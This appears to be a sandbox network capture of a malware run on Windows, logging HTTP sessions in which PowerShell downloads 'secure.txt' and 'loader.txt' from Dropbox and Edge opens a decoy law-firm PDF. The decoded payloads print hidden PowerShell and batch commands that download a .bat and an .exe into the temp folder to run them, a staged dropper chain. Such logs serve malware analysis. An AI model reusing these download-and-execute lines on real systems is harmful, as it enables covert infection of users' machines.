                                                                                                                                                                                                                                                                                              Location: https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com/cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=OTQxNzc1Nzk5Nzk4NTQ4NDM0NjcxNDIxNDgwMzIwNTkwMjQ1MQ==; Path=/; Expires=Sun, 09 Dec 2029 17:40:08 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=MKvJKaTODHWgWD41cqMKRksp; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:08 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=MKvJKaTODHWgWD41cqMKRksp; Path=/; Expires=Wed, 10 Dec 2025 17:40:08 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=hxwakN2Jp4; Path=/; Expires=Wed, 10 Dec 2025 17:40:08 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:08 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:09 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 21bc2d9733cc4d588d71f1631b0a4a74
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:09 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              2192.168.2.549706162.125.69.154435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:11 UTC370OUTGET /cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:12 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733737271361738d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 125
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:11 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: c33200a6fb5240c9b3dbe1eb944ce1b5
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:12 UTC411INData Raw: 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 6d 73 65 64 67 65 2e 65 78 65 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 2d 6b 69 6f 73 6b 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 73 69 72 67 72 68 35 77 63 6f 74 72 39 34 76 72 74 37 75 34 79 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 67 79 38 36 6c 6b 66 73 77 61 69 63 31 72 70 61 6e 67 6a 64 39 38 6b 39 6d 26 64 6c 3d 31 22 3b 20 24 52 61 6e 64 6f 6d 46 69 6c 65 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 62 61 74 22 3b 20 49 57 52 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 30 68 64 69
                                                                                                                                                                                                                                                                                              Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/0hdi


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              3192.168.2.549709162.125.65.184435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:18 UTC212OUTGET /scl/fi/0hdi5yqluk704whzcrld6/loader.txt?rlkey=b3m23z6tgb7mwwfbcjqi9kumq&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:20 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/ [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com/cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=MzM2NjQ5NTQ2NjkxODQzNTA3ODMwODAyMTkwNTc3MjczNDE2ODM1; Path=/; Expires=Sun, 09 Dec 2029 17:40:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=sk_dFr1Gm9Ocky7pI8qEEAeg; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=sk_dFr1Gm9Ocky7pI8qEEAeg; Path=/; Expires=Wed, 10 Dec 2025 17:40:19 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=K_P7W_H7oE; Path=/; Expires=Wed, 10 Dec 2025 17:40:19 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:19 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:19 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 9e95eef4c72343c78382a24b1bb26e01
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:20 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              4192.168.2.549712162.125.65.154435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:22 UTC370OUTGET /cd/0/get/CgASy2TSFZ6S3mHvJgxi7zq2dTJy1EbV_kkFt7x7pNv4EGcAcGs9ubYKnueanAgdrt18MpOGLByYptKhrOTVO8_-MDxUmiJFR7DlQRry8QaYCflUDCMGIFKMn6OimPUeMReCMy9lrgaEsqLezrEWxuZ7/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:22 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733737267866378d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 185
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:22 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 519
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 63b8ec134cec4baa8627b815f7a78a1d
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:22 UTC519INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 70 64 66 5c 22 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 65 78 65 5c 22 3b 20 49 57 52 20 2d 55 72 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 73 69 72 67 72 68 35 77 63 6f 74 72 39 34 76 72 74 37 75 34 79 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 67 79 38 36 6c 6b 66 73 77 61 69 63 31 72
                                                                                                                                                                                                                                                                                              Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1r


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              5192.168.2.549719162.125.65.184437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:23 UTC764OUTGET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:24 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; media-src https://* blob: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: db [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=MjQwMzQxNzM2ODM5MzA0MDU2NTA4NTUxMzQ3NDE4OTY1NzA0NjQz; Path=/; Expires=Sun, 09 Dec 2029 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=pHSx4GJawuFBnnq83dn0114j; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=pHSx4GJawuFBnnq83dn0114j; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=6iXgEsDCm8; Path=/; Expires=Wed, 10 Dec 2025 17:40:24 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:24 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:24 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: fa23cea16e9a4a2cbe997c258ad08868
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:24 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              6192.168.2.549736162.159.61.34437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8eff05234bdf191e-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              7192.168.2.549737172.64.41.34437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8eff05234b3e0c9c-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom&(c)


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              8192.168.2.549734162.125.69.154437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC888OUTGET /cd/0/get/CgDZZ7NRNr2v450QCTZug7jZFzZJPTsHUwjk_9BNTK-n3A9qdLP6FAO5cFvN4VKm1EPXATmH3b3gw9uIc3pPiVJoa0Rt1B_0Cr1uWZrNEfc69mshLAAcCdD4mQBvznFZpGLUNlW7R_rxS5sB5u1iHLf5/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
